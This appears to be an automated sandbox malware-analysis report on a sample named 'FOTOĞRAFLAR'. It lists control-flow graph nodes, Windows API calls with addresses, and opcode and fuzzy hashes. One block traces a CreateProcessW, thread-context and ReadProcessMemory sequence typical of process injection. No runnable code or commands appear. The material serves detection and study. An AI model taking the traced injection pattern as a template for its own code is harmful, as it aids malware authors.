                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 822 1235b10-1235bb0 call 1237fb0 * 3 829 1235bb2-1235bbc 822->829 830 1235bc7 822->830 829->830 832 1235bbe-1235bc5 829->832 831 1235bce-1235bd7 830->831 833 1235bde-1236290 831->833 832->831 834 12362a3-12362d0 CreateProcessW 833->834 835 1236292-1236296 833->835 842 12362d2-12362d5 834->842 843 12362da 834->843 836 1236298-123629c 835->836 837 12362dc-1236309 835->837 838 1236315-1236342 836->838 839 123629e 836->839 858 1236313 837->858 859 123630b-123630e 837->859 841 123634c-1236366 Wow64GetThreadContext 838->841 861 1236344-1236347 838->861 839->841 846 1236368 841->846 847 123636d-1236388 ReadProcessMemory 841->847 848 12366d1-12366d3 842->848 843->841 849 123667a-123667e 846->849 850 123638a 847->850 851 123638f-1236398 847->851 854 1236680-1236684 849->854 855 12366cf 849->855 850->849 856 12363c1-12363e0 call 1237630 851->856 857 123639a-12363a9 851->857 862 1236686-1236692 854->862 863 1236699-123669d 854->863 855->848 871 12363e2 856->871 872 12363e7-123640a call 1237770 856->872 857->856 864 12363ab-12363ba call 1237580 857->864 858->841 859->848 861->841 861->848 862->863 867 12366a9-12366ad 863->867 868 123669f-12366a2 863->868 864->856 878 12363bc 864->878 869 12366b9-12366bd 867->869 870 12366af-12366b2 867->870 868->867 875 12366ca-12366cd 869->875 876 12366bf-12366c5 call 1237580 869->876 870->869 871->849 881 1236454-1236475 call 1237770 872->881 882 123640c-1236413 872->882 875->848 876->875 878->849 888 1236477 881->888 889 123647c-123649a call 1237fd0 881->889 883 1236415-1236446 call 1237770 882->883 884 123644f 882->884 892 1236448 883->892 893 123644d 883->893 884->849 888->849 895 12364a5-12364af 889->895 892->849 893->881 896 12364b1-12364e3 call 1237fd0 895->896 897 12364e5-12364e9 895->897 896->895 899 12365d4-12365f1 call 1237180 897->899 900 12364ef-12364ff 897->900 907 12365f3 899->907 908 12365f8-1236617 Wow64SetThreadContext 899->908 900->899 903 1236505-1236515 900->903 903->899 906 123651b-123653f 903->906 909 1236542-1236546 906->909 907->849 910 123661b-1236626 call 12374b0 908->910 911 1236619 908->911 909->899 912 123654c-1236561 909->912 920 123662a-123662e 910->920 921 1236628 910->921 911->849 914 1236575-1236579 912->914 915 12365b7-12365cf 914->915 916 123657b-1236587 914->916 915->909 918 12365b5 916->918 919 1236589-12365b3 916->919 918->914 919->918 922 1236630-1236633 920->922 923 123663a-123663e 920->923 921->849 922->923 925 1236640-1236643 923->925 926 123664a-123664e 923->926 925->926 927 1236650-1236653 926->927 928 123665a-123665e 926->928 927->928 929 1236660-1236666 call 1237580 928->929 930 123666b-1236674 928->930 929->930 930->833 930->849
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 012362CB
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01236361
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01236383
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696671381.0000000001234000.00000040.00000020.00020000.00000000.sdmp, Offset: 01234000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1234000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                      • Instruction ID: 44d815ec8731252cd5ded75901cbf658eaba41781ec8d588aeeae6c450845f34
                                                                      • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                      • Instruction Fuzzy Hash: EB620E70A242589BEB24CF64C841BDEB776EF58300F1091A9D20DEB394E7759E81CB59
                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D540D9
                                                                        • Part of subcall function 00D184E7: _wcslen.LIBCMT ref: 00D184FA
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D1588F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                      • String ID: Line:
                                                                      • API String ID: 2289894680-1585850449
                                                                      • Opcode ID: 623062eefd77fdd0da8e3a9ed9543922ad2d6457c533baa9ce69f77f122128f2
                                                                      • Instruction ID: 11eebc34263ff2cc611d7fea0a31fdae5255a311d8d938a7fe50f65375583785
                                                                      • Opcode Fuzzy Hash: 623062eefd77fdd0da8e3a9ed9543922ad2d6457c533baa9ce69f77f122128f2
                                                                      • Instruction Fuzzy Hash: 11317C71508344AED720EB20F885BEB77E8EB94710F14452AF59982191DF749A88CBF6
                                                                      APIs
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00D305E8
                                                                        • Part of subcall function 00D33234: RaiseException.KERNEL32(?,?,?,00D3060A,?,00000001,?,?,?,?,?,?,00D3060A,?,00DD8748), ref: 00D33294
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00D30605
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                      • String ID: Unknown exception
                                                                      • API String ID: 3476068407-410509341
                                                                      • Opcode ID: 590cfa0c585cce8f2f45ba70691beff12529c571bb6ed5becbd03e0f4f3a5b9c
                                                                      • Instruction ID: f585d4672e676a0006f0a0d6306f61b4b7d14c87deeb328f5e763e4d315d290d
                                                                      • Opcode Fuzzy Hash: 590cfa0c585cce8f2f45ba70691beff12529c571bb6ed5becbd03e0f4f3a5b9c
                                                                      • Instruction Fuzzy Hash: 70F0C23490020C778F04B7A8E856D9E7B7C9E10714FA44571B924D64D2EB71EA5ACAF0
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00D9821C
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00D98223
                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00D98404
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                      • String ID:
                                                                      • API String ID: 146820519-0
                                                                      • Opcode ID: 98540e2c2e4e9df9821a9155a17b13d98afa2b6faac6e60da0f7c18d5420a433
                                                                      • Instruction ID: 4c524e33453ad24405fd0cd8cbd30042ceb0ee8b2cede5c0af6b4dcecc794ee6
                                                                      • Opcode Fuzzy Hash: 98540e2c2e4e9df9821a9155a17b13d98afa2b6faac6e60da0f7c18d5420a433
                                                                      • Instruction Fuzzy Hash: DB127D71A083419FCB14DF28C484B6ABBE5FF85714F04895DF8899B352DB31E946CBA2
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,00D4856C,?,00DD8CD8,0000000C), ref: 00D486A4
                                                                      • GetLastError.KERNEL32(?,00D4856C,?,00DD8CD8,0000000C), ref: 00D486AE
                                                                      • __dosmaperr.LIBCMT ref: 00D486D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 2583163307-0
                                                                      • Opcode ID: a2a43c03f7a6117529fca634b133903563a15e46463e51d4135641b35596903e
                                                                      • Instruction ID: f3533f8522c3f72fade567e9731a6a662750fa7d81db652b1911ed6df3316a66
                                                                      • Opcode Fuzzy Hash: a2a43c03f7a6117529fca634b133903563a15e46463e51d4135641b35596903e
                                                                      • Instruction Fuzzy Hash: E8012B33A047641BD6A427346889B7E67498B827B4F2E0119F919DB2D3DEA09C81A1B0
                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 00D230F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: CALL
                                                                      • API String ID: 1385522511-4196123274
                                                                      • Opcode ID: ee444311fe55f7a76f0562e6037dc69ca08c87e45e4a0afb0a6dcda90a378f88
                                                                      • Instruction ID: 965f7fbc13a458334555e103a7a7fc315fa4e5722058af1012e3cb3daaa56d46
                                                                      • Opcode Fuzzy Hash: ee444311fe55f7a76f0562e6037dc69ca08c87e45e4a0afb0a6dcda90a378f88
                                                                      • Instruction Fuzzy Hash: 75227970608351AFC714DF14E880A2ABBF1FFA5318F18891DF4968B261D775E945CBB2
                                                                      APIs
                                                                        • Part of subcall function 00D16832: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D1687F,?,PO,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D1683E
                                                                        • Part of subcall function 00D16832: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D16850
                                                                        • Part of subcall function 00D16832: FreeLibrary.KERNEL32(00000000,?,?,00D1687F,?,PO,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D16862
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,PO,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D1689F
                                                                        • Part of subcall function 00D167FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D5488B,?,PO,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D16804
                                                                        • Part of subcall function 00D167FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D16816
                                                                        • Part of subcall function 00D167FB: FreeLibrary.KERNEL32(00000000,?,?,00D5488B,?,PO,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D16829
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressFreeProc
                                                                      • String ID: PO
                                                                      • API String ID: 2632591731-1232444006
                                                                      • Opcode ID: ebb3f4674a0b536cd08021ec4a807293f33650aabcf16258bfce929ce6c20ebe
                                                                      • Instruction ID: 68dbd8810a02e39bd29587c90422f71ba0d0e719910cb0f6d19b444b1bb9958c
                                                                      • Opcode Fuzzy Hash: ebb3f4674a0b536cd08021ec4a807293f33650aabcf16258bfce929ce6c20ebe
                                                                      • Instruction Fuzzy Hash: 6011C132600215BACF14BB74E802BED7BA5DF44B10F20842DF882A61C1EF70DA859BB1
                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00D5386E
                                                                        • Part of subcall function 00D1592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D15922,?,?,00D148AA,?,?,?,00000000), ref: 00D1594D
                                                                        • Part of subcall function 00D147D0: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D147EF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                      • String ID: X
                                                                      • API String ID: 779396738-3081909835
                                                                      • Opcode ID: 73285bff849b76256f76a6260ee861bf306b4a0db48a16556ad39dd259e2f143
                                                                      • Instruction ID: 7b633c7d1e2e37aab7ad8801e243c070ece51804349f8f211e69188b80cc7d63
                                                                      • Opcode Fuzzy Hash: 73285bff849b76256f76a6260ee861bf306b4a0db48a16556ad39dd259e2f143
                                                                      • Instruction Fuzzy Hash: 5A218170A00298AADB01DF94E845BEE7BB99F49315F00405AE814AB341DFB49A8D8FB1
                                                                      APIs
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D15793
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: e93092f8706319a35f07aee0891ded988733055369281c33778a4f78714e9282
                                                                      • Instruction ID: 7147569674f6ceb49eb9c198461c8b486857c5887b32068c40318822b4f8bffe
                                                                      • Opcode Fuzzy Hash: e93092f8706319a35f07aee0891ded988733055369281c33778a4f78714e9282
                                                                      • Instruction Fuzzy Hash: C0318474604701DFD321EF24E8857D7BBE4FB49318F04092DE599C7280EBB5A984CB66
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00D1AE0C,?,00008000), ref: 00D17113
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00D1AE0C,?,00008000), ref: 00D54BFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: d82843ccaf40fcf0feecfd19f612e3c07f5305d2825c2c8c4f63e5b1c7d5fb8c
                                                                      • Instruction ID: 530d44e132f00d57635650214997ee192fb2992f93598eacbca0e53a34a9086d
                                                                      • Opcode Fuzzy Hash: d82843ccaf40fcf0feecfd19f612e3c07f5305d2825c2c8c4f63e5b1c7d5fb8c
                                                                      • Instruction Fuzzy Hash: B4018031245321B6E7315A26DC0EF977F98EF06774F148300BE985E1E0CAB45894CBA0
                                                                      APIs
                                                                      • IsThemeActive.UXTHEME ref: 00D136AD
                                                                        • Part of subcall function 00D13656: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D1366B
                                                                        • Part of subcall function 00D13656: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D13682
                                                                        • Part of subcall function 00D1445D: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D136D8,?), ref: 00D1448D
                                                                        • Part of subcall function 00D1445D: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D136D8,?), ref: 00D144A0
                                                                        • Part of subcall function 00D1445D: GetFullPathNameW.KERNEL32(00007FFF,?,?,PO,00DE1400,?,?,?,?,?,?,00D136D8,?), ref: 00D14515
                                                                        • Part of subcall function 00D1445D: SetCurrentDirectoryW.KERNEL32(?,00000001,PO,?,?,?,?,?,?,?,00D136D8,?), ref: 00D14596
                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00D136E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                      • String ID:
                                                                      • API String ID: 1550534281-0
                                                                      • Opcode ID: 194f7077ab21ae631c208160cd1a4ab3fcd54ee45b459d4958d7cef8d33b9e5d
                                                                      • Instruction ID: 474c9b7a0a38f003ba4c6f517cc41831f5143a405d0587d4b999a2317c6901d2
                                                                      • Opcode Fuzzy Hash: 194f7077ab21ae631c208160cd1a4ab3fcd54ee45b459d4958d7cef8d33b9e5d
                                                                      • Instruction Fuzzy Hash: DEF03A35654384AFE7007BA0FC9BB6537A8E701B55F044415F108DDBE2DBB5A8908B70
                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 00D1D44E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      • Opcode ID: f8bd4363fc8390edfc92a523bfdb342680ab40e862a41f7cca5414eeb6055860
                                                                      • Instruction ID: d91f5de531b6501101f38b149094fe02f3b2d3dd6df96bd2c0453a529e03648f
                                                                      • Opcode Fuzzy Hash: f8bd4363fc8390edfc92a523bfdb342680ab40e862a41f7cca5414eeb6055860
                                                                      • Instruction Fuzzy Hash: 3232BE75A04215EFCB24DF54D884ABABBBAEF44300F188059E955AB391CB74ED81CBB1
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 012362CB
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01236361
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01236383
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696671381.0000000001234000.00000040.00000020.00020000.00000000.sdmp, Offset: 01234000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1234000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                      • Instruction ID: cf854d3d20507759277801b17ff12c4027b0380f13c369ece85a436a4b92a28c
                                                                      • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                      • Instruction Fuzzy Hash: 4912CF24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 6619f52302f1136a265b3061a5e37ddf84c957e92e99fff4775e54295459f0d6
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 92310A70A001199BC708DF18E4D0969F7B2FF69304B288AB5E849CB755D731EDC1EBA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: __wsopen_s
                                                                      • String ID:
                                                                      • API String ID: 3347428461-0
                                                                      • Opcode ID: 7f12091233b059eda6e5cda8f9c586404f6240cd4642a7cdd3a74cffd6b59c23
                                                                      • Instruction ID: 43d8032bd623389b6a4dcee9f286c10056d98e282950ad7740419e995df29406
                                                                      • Opcode Fuzzy Hash: 7f12091233b059eda6e5cda8f9c586404f6240cd4642a7cdd3a74cffd6b59c23
                                                                      • Instruction Fuzzy Hash: 2711067290420AAFCB05DF98E94599E7BF5EF48350F144459F808AB311DA31DA119BB5
                                                                      APIs
                                                                        • Part of subcall function 00D44C0D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D42DB9,00000001,00000364,?,00D2FD75,?,?,00D1B63D,00000000,?,?), ref: 00D44C4E
                                                                      • _free.LIBCMT ref: 00D44FFC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
